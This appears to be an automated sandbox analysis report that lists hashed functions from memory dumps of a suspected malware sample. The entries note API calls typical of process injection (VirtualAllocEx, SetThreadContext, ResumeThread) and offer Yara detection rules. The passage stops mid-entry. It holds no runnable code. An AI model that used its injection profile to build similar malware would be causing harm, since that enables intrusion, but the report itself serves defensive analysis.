String ID:
API String ID: 1726664587-0
Opcode ID: 3e1d4c2d214b51c5781bba0f2ab0011547228cc041e7169671364e75556d146d
Instruction ID: ae126a0fc16c64e4bad82518995853fb0d56795a35e8214b436846fe2ab2898f
Opcode Fuzzy Hash: 3e1d4c2d214b51c5781bba0f2ab0011547228cc041e7169671364e75556d146d
Instruction Fuzzy Hash: 6341A8B5D04258DFCF00CFA9D884AEEFBB5BB19310F14942AE815B7240D735A946CF64

Uniqueness

Uniqueness Score: -1.00%

Function 053E6CA8, Relevance: 1.6, APIs: 1, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 053E6D5A

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4d4dd91529b1cb499ec139ac9e33a261645851a939e093aea4ed40b0b16c7954
Instruction ID: 2f7c6519a0ab3e514b635f51cfb597d39399d6c5ceaeee01f8533f6a87a0f82e
Opcode Fuzzy Hash: 4d4dd91529b1cb499ec139ac9e33a261645851a939e093aea4ed40b0b16c7954
Instruction Fuzzy Hash: F931A8B4D04258DBCF00CFA9E884ADEFBB5BB59310F10942AE815BB250D735A906CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 053E6CB0, Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 053E6D5A

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5fd8442c66aa9d086addd462d248864fe6acffe9ef3124c41c215688839c5868
Instruction ID: 1373d058a2f16cb5f169cb2121d49c2f0637cfcb0d9b9217977e45e3b0771528
Opcode Fuzzy Hash: 5fd8442c66aa9d086addd462d248864fe6acffe9ef3124c41c215688839c5868
Instruction Fuzzy Hash: 1A31A8B8D04258DFCF10CFA9E884ADEFBB5BB59310F10942AE815B7200D735A906CF64

Uniqueness

Uniqueness Score: -1.00%

Function 04BF6DE0, Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(?,?,?), ref: 04BF7E92

Memory Dump Source

Source File: 00000000.00000002.241854154.0000000004BF0000.00000040.00000001.sdmp, Offset: 04BF0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 999e6ef4410490374a4fa021d826ce60e8b4fd2d6e9ef9be2fdbd35e892c2209
Instruction ID: 225e527a90eb2eafdb47bf7fc95aaab5b837af6b587301e5575b076995a47c48
Opcode Fuzzy Hash: 999e6ef4410490374a4fa021d826ce60e8b4fd2d6e9ef9be2fdbd35e892c2209
Instruction Fuzzy Hash: A84197B5D04258DFCB10CFA9D884A9EFBF5FB49310F14946AE918BB210D734A94ACF94

Uniqueness

Uniqueness Score: -1.00%

Function 04BF7DE0, Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(?,?,?), ref: 04BF7E92

Memory Dump Source

Source File: 00000000.00000002.241854154.0000000004BF0000.00000040.00000001.sdmp, Offset: 04BF0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3945f5192c557f8fd74b6e8c5eda992b43edfa340f1cba2ce97df7128d91717e
Instruction ID: 14f60e61abd6692d2da36549078e149362cfc7f0658c132bb46b083a918a40a2
Opcode Fuzzy Hash: 3945f5192c557f8fd74b6e8c5eda992b43edfa340f1cba2ce97df7128d91717e
Instruction Fuzzy Hash: 0F41A5B5D002489FCB10CFA9D884ADEFBF5FB09310F14906AE918BB210D734A94ACF95

Uniqueness

Uniqueness Score: -1.00%

Function 04BFAB74, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04BFC4C1

Memory Dump Source

Source File: 00000000.00000002.241854154.0000000004BF0000.00000040.00000001.sdmp, Offset: 04BF0000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 12f9708e6639a03995f40dab11c9367226f57a84dd51e030439fb5471f3aa121
Instruction ID: 1614913562238b20072219d99d62b62443b65f2d78ab3c846433040894dedd39
Opcode Fuzzy Hash: 12f9708e6639a03995f40dab11c9367226f57a84dd51e030439fb5471f3aa121
Instruction Fuzzy Hash: F1414CB5A00609CFDB10CF99C888AAABBF5FF88314F15C499D519AB321D734E945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C91779, Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 00C91827

Memory Dump Source

Source File: 00000000.00000002.237007888.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 7be24410344d3c2d8bb692acc8fd1e3f31b51fc01d8b6fba9290fdfeae0e2114
Instruction ID: 91827e8caa941142c8764cb22f6b74bfd2f5c53ca649804f42303b7458396b31
Opcode Fuzzy Hash: 7be24410344d3c2d8bb692acc8fd1e3f31b51fc01d8b6fba9290fdfeae0e2114
Instruction Fuzzy Hash: 94319AB9D042589FCF10CFA9D984AEEFBF1BB19310F14902AE814B7250D775AA46CF64

Uniqueness

Uniqueness Score: -1.00%

Function 053E6B80, Relevance: 1.6, APIs: 1, Instructions: 96threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,?), ref: 053E6C37

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 8a5d1a5f1766c6ecd0e9ba840ea1d541bd9dd319c531f2e1315061805e18a6cd
Instruction ID: a3a469fedb847608616f7948987bd84256c97204f35f35c318369b700a2d22e1
Opcode Fuzzy Hash: 8a5d1a5f1766c6ecd0e9ba840ea1d541bd9dd319c531f2e1315061805e18a6cd
Instruction Fuzzy Hash: 2F41ABB4D012589FCB10CFA9D985AEEBBF1BB49314F14802AE419B7240D779AA4ACF54

Uniqueness

Uniqueness Score: -1.00%

Function 00C91780, Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 00C91827

Memory Dump Source

Source File: 00000000.00000002.237007888.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 080109bb5656319c4aee918665d29fa64e0e7cd561adb8d6f05c13b5e2403b56
Instruction ID: d5925b37b83332748b23d8fc0d03ec99ec95568cd3c22e3196d74231f64183d5
Opcode Fuzzy Hash: 080109bb5656319c4aee918665d29fa64e0e7cd561adb8d6f05c13b5e2403b56
Instruction Fuzzy Hash: 013199B5D042589FCF10CFAAD984ADEFBF5BB09310F14902AE814B7250D775AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00C99DB0, Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 00C99E57

Memory Dump Source

Source File: 00000000.00000002.237007888.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 556d40bebbe50692119615ac415233fac1fbef825813cf02b0396bcde5bb8e84
Instruction ID: edd1c692832ac84128c3fc257065d9df6fc9473f3156d776880cdf05ac349670
Opcode Fuzzy Hash: 556d40bebbe50692119615ac415233fac1fbef825813cf02b0396bcde5bb8e84
Instruction Fuzzy Hash: 743177B9D042589FCF10CFA9D984ADEFBF5BB19310F14902AE814B7210D775AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 053E6B88, Relevance: 1.6, APIs: 1, Instructions: 94threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,?), ref: 053E6C37

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 0f09e7e8bd4c5534f609261fe005e18a305493448fdd5d2e1138cf3425fc1a3a
Instruction ID: a8b52211759940a7dcc9d1e3767c7e1ef53ee994b9319922fee5d740f9f3863e
Opcode Fuzzy Hash: 0f09e7e8bd4c5534f609261fe005e18a305493448fdd5d2e1138cf3425fc1a3a
Instruction Fuzzy Hash: 1031BAB4D012589FCB10CFAAD885AEEBBF5BB49314F14802AE419B7240D778A949CF94

Uniqueness

Uniqueness Score: -1.00%

Function 053EA188, Relevance: 1.6, APIs: 1, Instructions: 85windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 053EA223

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 4c82df8eeb939fd66cf91167e069249cb7a56f01d0ce33ad0f950bf6cfda6567
Instruction ID: 34675e21e01f235cf8bdc7b1da42e7d9a09c9224ba2a6c09207d676a30a03509
Opcode Fuzzy Hash: 4c82df8eeb939fd66cf91167e069249cb7a56f01d0ce33ad0f950bf6cfda6567
Instruction Fuzzy Hash: 173167B9D042589FCB10CFA9E584ADEFBF5BB49310F14902AE818BB310D775A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00C903C8, Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNELBASE(?), ref: 00C9B79A

Memory Dump Source

Source File: 00000000.00000002.237007888.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: e33db3ac73a8d759bb17043a5fddb1f568a31870b6cf056dde7c32b0a49c6812
Instruction ID: fc0e167914234f610ab0e6d2b8ed87a60863e43c42ac47b25a195208a8e9d28c
Opcode Fuzzy Hash: e33db3ac73a8d759bb17043a5fddb1f568a31870b6cf056dde7c32b0a49c6812
Instruction Fuzzy Hash: A131ABB4D002489FCF14CFA9E584ADEFBF5AB49314F14902AE818B7310D734A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 04BF7AD8, Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(?), ref: 04BF7B6A

Memory Dump Source

Source File: 00000000.00000002.241854154.0000000004BF0000.00000040.00000001.sdmp, Offset: 04BF0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: da6a8d09af7d84f0a38186c8d12b0312ef0f59e53a7222457baac30678bf491d
Instruction ID: b0961615a1f563337eaa1e854cb2543a20256bc8c37bc747034558949c362074
Opcode Fuzzy Hash: da6a8d09af7d84f0a38186c8d12b0312ef0f59e53a7222457baac30678bf491d
Instruction Fuzzy Hash: BA31A9B5D002489FCB14CFA9D884ADEFBF5EB49314F1490AAE918B7310D734A946CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 053E6A91, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 053E6B16

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: a9b77edfee80e0f378a65e78a13ea7bbaf0c3439c2cf7e9021d5c6b42e5d35ff
Instruction ID: 7a185ee7917d4c4801e10bf5c99ef2dd2fed85b1d825be8a82f0ad40ffdaf239
Opcode Fuzzy Hash: a9b77edfee80e0f378a65e78a13ea7bbaf0c3439c2cf7e9021d5c6b42e5d35ff
Instruction Fuzzy Hash: 8031BAB4D002589FCF14CFAAE885AEEFBF5BB49314F14942AE819B7200C735A905CF94

Uniqueness

Uniqueness Score: -1.00%

Function 053E6A98, Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 053E6B16

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 858ed327df932847ea96aaaad082d2271cd594dc740d91a58586b3b518e436fc
Instruction ID: 2de583a935092773ffc9052f23554399c7b91baf73d28dbee0b24d7aed5d1776
Opcode Fuzzy Hash: 858ed327df932847ea96aaaad082d2271cd594dc740d91a58586b3b518e436fc
Instruction Fuzzy Hash: 7831BAB4D002189BCF10CFAAE884ADEFBF5BB49314F14942AE815B7200C735A905CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00C0D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.236881072.0000000000C0D000.00000040.00000001.sdmp, Offset: 00C0D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d165dd1c7992b9cb02d13f286f2357412ac396ae8aa766299dc8f2aef3f422fe
Instruction ID: b7f8fcd5b1cfec6e176dce4f7c340125b49af7761652f16be92adfc925b25dcc
Opcode Fuzzy Hash: d165dd1c7992b9cb02d13f286f2357412ac396ae8aa766299dc8f2aef3f422fe
Instruction Fuzzy Hash: D221F275608240DFDB14CF94D9C4B26BB65FB88328F24C969E84E4B286C73AD846DA61

Uniqueness

Uniqueness Score: -1.00%

Function 00C0D005, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.236881072.0000000000C0D000.00000040.00000001.sdmp, Offset: 00C0D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d6aa4582030adba9c04324cf2e75a681727eb86105009b29ccda287b8194e49
Instruction ID: aff2442262c1b6e9c5060c7c38669d6d4be4f2d586b072f6b451cf679f680e75
Opcode Fuzzy Hash: 9d6aa4582030adba9c04324cf2e75a681727eb86105009b29ccda287b8194e49
Instruction Fuzzy Hash: AF218E755093C08FCB02CF24D994B15BF71EB46314F28C5EAD8498B6A7C33A994ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00BFD7FD, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.236827319.0000000000BFD000.00000040.00000001.sdmp, Offset: 00BFD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 966c729c91a701f9533aa622e74cbc1efd5a69ca96c0ac37ba45e7070ae600a6
Instruction ID: a9758d8338bd1a124e3640a97db55cd2870b99fd8d39926130c8755686d8b577
Opcode Fuzzy Hash: 966c729c91a701f9533aa622e74cbc1efd5a69ca96c0ac37ba45e7070ae600a6
Instruction Fuzzy Hash: 3301F771408348DAE7104A55DCC47B7BBDDEF413B4F18C4AAEE055B242D3789C48C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 00BFD7FC, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.236827319.0000000000BFD000.00000040.00000001.sdmp, Offset: 00BFD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5efbb32ad33f2c99ba5d0727d9b4fdbe5d3b024a4212de6780455d845a9cd5dd
Instruction ID: d4341f28823bc0768df369a39d3f7aca3e28c4d4855b558246e69b4e50a4154e
Opcode Fuzzy Hash: 5efbb32ad33f2c99ba5d0727d9b4fdbe5d3b024a4212de6780455d845a9cd5dd
Instruction Fuzzy Hash: 98F06271404248AAE7108A16DD84BB6FBDCEB51774F18C4AAEE485B286C3799C48CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 053E3F40, Relevance: 1.5, Strings: 1, Instructions: 246COMMON

Download Yara Rule

Strings

^aC/, xrefs: 053E4058

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID:
String ID: ^aC/
API String ID: 0-856041221
Opcode ID: e6a440f2a949f89e34cd195e5d2fe3c76a451357863019d5bb473d7f64743964
Instruction ID: 7916d4bc65c0173165401b79c1a91d39404a26560669c0352571c930373bcc9d
Opcode Fuzzy Hash: e6a440f2a949f89e34cd195e5d2fe3c76a451357863019d5bb473d7f64743964
Instruction Fuzzy Hash: D1A10474E042198BCF08CFE9C9855EEFBF6BF88314F148566D815FB294E734A9428B64

Uniqueness

Uniqueness Score: -1.00%

Function 053E3F37, Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

^aC/, xrefs: 053E4058

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID:
String ID: ^aC/
API String ID: 0-856041221
Opcode ID: 2a2a16999b9a7c6bab372903f9aa3470a94d2170d463c0ca7c47c87830058db9
Instruction ID: 71d6184727ed0a4848cf6d2b27892bed45513398b64d3e4530509f42d5ae0112
Opcode Fuzzy Hash: 2a2a16999b9a7c6bab372903f9aa3470a94d2170d463c0ca7c47c87830058db9
Instruction Fuzzy Hash: D1A11574E042198BCF08CFE9C5855EEFBF6BF88314F14856AD815FB294EB3499428B64

Uniqueness

Uniqueness Score: -1.00%

Function 053E3F32, Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

^aC/, xrefs: 053E4058

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID:
String ID: ^aC/
API String ID: 0-856041221
Opcode ID: 18dac56b7db248724c2a3210af2413b4844a583795e2508b4f10931ca0ee76d8
Instruction ID: 434c45e0177d75a48150502466f64301884d9fc53611399858e90de66eb54f1f
Opcode Fuzzy Hash: 18dac56b7db248724c2a3210af2413b4844a583795e2508b4f10931ca0ee76d8
Instruction Fuzzy Hash: F3A10574E042198BCF08CFE9C5855EEFBF6BF88314F148566D815FB298E734A9428B64

Uniqueness

Uniqueness Score: -1.00%

Function 00C96820, Relevance: 1.4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

Strings

<!s, xrefs: 00C969F1

Memory Dump Source

Source File: 00000000.00000002.237007888.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID: <!s
API String ID: 0-3869407473
Opcode ID: cd4a403be001ff3af2652cfe0dd948f541a2b98085780f73f4475c16104265a0
Instruction ID: 1e897d14c923b18f2888f71bd0f13284cc198e1ac5842c80f79f25c6cee39a18
Opcode Fuzzy Hash: cd4a403be001ff3af2652cfe0dd948f541a2b98085780f73f4475c16104265a0
Instruction Fuzzy Hash: 4E610570E152098FCF04CFAAC5855EEBBF2FF89310F24946AD415B7294D334AA428B69

Uniqueness

Uniqueness Score: -1.00%

Function 00C96830, Relevance: 1.4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

Strings

<!s, xrefs: 00C969F1

Memory Dump Source

Source File: 00000000.00000002.237007888.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID: <!s
API String ID: 0-3869407473
Opcode ID: e44f579fa719ddcb0a12200b1e07cc4a0c87e80155021df75e5dca9de9a7c377
Instruction ID: f9385f3f25b3d040bc77f83521f4528cfc4c3da831dd9df637399731d288b3c3
Opcode Fuzzy Hash: e44f579fa719ddcb0a12200b1e07cc4a0c87e80155021df75e5dca9de9a7c377
Instruction Fuzzy Hash: A271F574E152098FCF04CFAAC5855EEBBF2FF88310F24946AD416B7294D734AA418B68

Uniqueness

Uniqueness Score: -1.00%

Function 00C95210, Relevance: 1.4, Strings: 1, Instructions: 116COMMON

Download Yara Rule

Strings

38, xrefs: 00C9529C

Memory Dump Source

Source File: 00000000.00000002.237007888.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID: 38
API String ID: 0-2982242665
Opcode ID: c5a65ff4e73770a224f2fbca6b1cd9fee3c2de03cc28033d6adcc6ecf8b8ae6f
Instruction ID: 47f9d7776672a261a4604e448d2838461119d8afb638a1446415f05b8efbd5ff
Opcode Fuzzy Hash: c5a65ff4e73770a224f2fbca6b1cd9fee3c2de03cc28033d6adcc6ecf8b8ae6f
Instruction Fuzzy Hash: 09417A74D05A09DFCF04CFAAC5855AEFBB2FF89340F24D499C419AB219D3349A429F91

Uniqueness

Uniqueness Score: -1.00%

Function 04BF80D0, Relevance: .5, Instructions: 522COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.241854154.0000000004BF0000.00000040.00000001.sdmp, Offset: 04BF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8055ecf6631ed587a7d890a50dce1161e4a5e18b9c5d88b295f03c10de07df27
Instruction ID: 5c79d194ef3cb201dc15a1514ab0abdc226f92f0f91291e06a57a36996929370
Opcode Fuzzy Hash: 8055ecf6631ed587a7d890a50dce1161e4a5e18b9c5d88b295f03c10de07df27
Instruction Fuzzy Hash: A7526AB0941F01CFD720CF94EA8819D3BB1FB45318B566A08D6659B290D3F969EECF84

Uniqueness

Uniqueness Score: -1.00%

Function 053E5F10, Relevance: .3, Instructions: 291COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 902aca8aad3a45e507afdd6786a3c7951ca8a494ddf8ac3960cce27e34c75c22
Instruction ID: cad069b5c50cbfb9af1b288be93febf8f52469701d325ba7ac5de70a507bd35f
Opcode Fuzzy Hash: 902aca8aad3a45e507afdd6786a3c7951ca8a494ddf8ac3960cce27e34c75c22
Instruction Fuzzy Hash: 7CD14B74E14229CFCB14CFA9D981AADFBF6BF89304F24816AD409AB395D7309941CF61

Uniqueness

Uniqueness Score: -1.00%

Function 053E5F68, Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a85bec3de73454d005bb4b395966902b147aeb5598e04ddbca2ecc793c8a0ef1
Instruction ID: 5d241724ad70c069a1f8e4850a8c912f0ee516cca3084f1105002f0c3d6910b3
Opcode Fuzzy Hash: a85bec3de73454d005bb4b395966902b147aeb5598e04ddbca2ecc793c8a0ef1
Instruction Fuzzy Hash: A6D13974E14229CFCB14CFA9D981AADFBF6BF89304F248169D409AB355DB309941CF61

Uniqueness

Uniqueness Score: -1.00%

Function 04BF56C8, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.241854154.0000000004BF0000.00000040.00000001.sdmp, Offset: 04BF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6df8f604f4b577b7597c4b45afd92c88286535ad4b482deaa33921788a90768
Instruction ID: 3e0362198a188e6b7b90e8425db5d95aa95b6abc01e0feec3b74f4a925289298
Opcode Fuzzy Hash: e6df8f604f4b577b7597c4b45afd92c88286535ad4b482deaa33921788a90768
Instruction Fuzzy Hash: 77A17F32E00219CFCF15DFB5CC4459DB7B2FF85304B1585AAE909BB221EB35A91ACB50

Uniqueness

Uniqueness Score: -1.00%

Function 053E84C8, Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 456375e0bbc9a80d10ac8f8cb633f8f481db49af5f3611580afa1f70ad99e93d
Instruction ID: a03b4f160a95cbc95b57d9399ab03ba18515634d1ddd705032f1ae85c4a69112
Opcode Fuzzy Hash: 456375e0bbc9a80d10ac8f8cb633f8f481db49af5f3611580afa1f70ad99e93d
Instruction Fuzzy Hash: A0910374E05219CFDB08CFA9D5515EEFBF6BB89300F20942AD516BB394DB309A428F64

Uniqueness

Uniqueness Score: -1.00%

Function 00C9A1B0, Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.237007888.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d63bfb50a028b7801a3a58d9dec54dd49ec22341ed6709122cde92aee8f304cb
Instruction ID: 451079a99503f86839c2d27a40fdab56322a239fbcec6ce0aa8595479e79f3a5
Opcode Fuzzy Hash: d63bfb50a028b7801a3a58d9dec54dd49ec22341ed6709122cde92aee8f304cb
Instruction Fuzzy Hash: 77914974E141198BDB14CFA9C984AAEFBF6FB89304F24C56AD408A7355D7309A42CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C95420, Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.237007888.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f6f758596a16a0c9c872a02089f7934b79000950950c981b913d7cc1b46020f
Instruction ID: da55d46eb261f445a1c6c8d7d1108e9cdc7a38fe3e59d1576d035dbebceccc70
Opcode Fuzzy Hash: 6f6f758596a16a0c9c872a02089f7934b79000950950c981b913d7cc1b46020f
Instruction Fuzzy Hash: 7C810174A15619CFCB44CFA9C58499EFBF2FF88310F24856AE419AB364D334AA42CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00C95411, Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.237007888.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de5252bd802b23e3dd8b98bfa9c1f5ca06c2e51cee3092e0a1eac6ac33c8678c
Instruction ID: 276635cb3a12593e3fbaae94e726a53c1031c3b19f612c1b2200586533e85fb9
Opcode Fuzzy Hash: de5252bd802b23e3dd8b98bfa9c1f5ca06c2e51cee3092e0a1eac6ac33c8678c
Instruction Fuzzy Hash: 23811374A01619CFCB45CFA9C584A9EFBF2FF88311F248569E415AB364D330AA46CF50

Uniqueness

Uniqueness Score: -1.00%

Function 053E8870, Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d09092d8e840d5035c80f32c6146b8a93134f14153569794a5bae5bcef767eaa
Instruction ID: 34bb650c69e1381b7571c29a31c4a541f20aeb96c877cf2a176210fd7690fe1f
Opcode Fuzzy Hash: d09092d8e840d5035c80f32c6146b8a93134f14153569794a5bae5bcef767eaa
Instruction Fuzzy Hash: 57611671D1462ACBDB68CF66C8447A9F6F7BFC9300F14D5AAC40EB6654EB305A858F04

Uniqueness

Uniqueness Score: -1.00%

Function 00C95FA0, Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.237007888.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a3e9dc5d083c146a3f6231b963fb90a87b4c8e21e7d1278325b053629c8143f
Instruction ID: 72a83369702a8fd089b98d7f2cbff2a33892a0f9bff57cede631371ced9418b6
Opcode Fuzzy Hash: 4a3e9dc5d083c146a3f6231b963fb90a87b4c8e21e7d1278325b053629c8143f
Instruction Fuzzy Hash: B361F3B4E05219CFCF44CF99C5849AEFBF2BB48310F20955AE905BB254C331A942CB95

Uniqueness

Uniqueness Score: -1.00%

Function 053E43E8, Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78dba6c6638441594705dad4eb1d6984486ce3a5bac254267d321ec31f41aaba
Instruction ID: 60d4ebc0a7b6b94f9083107c06c5f5635b40517223c36cbbd5d4694fd853fc1d
Opcode Fuzzy Hash: 78dba6c6638441594705dad4eb1d6984486ce3a5bac254267d321ec31f41aaba
Instruction Fuzzy Hash: C3515774E042299FCF04CFAAD481AEEBBF6BF88310F54D426D414A7294E77499418FA0

Uniqueness

Uniqueness Score: -1.00%

Function 053E43D7, Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03971df063be9d24e6cfea1863df2465b4811130a39fda43337a9962ad62a057
Instruction ID: 28d98a20f3ce518471a64f472c24a1590dc4cf873c2193d86dba76c0bb3d56ed
Opcode Fuzzy Hash: 03971df063be9d24e6cfea1863df2465b4811130a39fda43337a9962ad62a057
Instruction Fuzzy Hash: 25514874E012299FCF04CFAAD484AEEBBF2BF88310F54D426D414A7294E7749A418FA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C95F91, Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

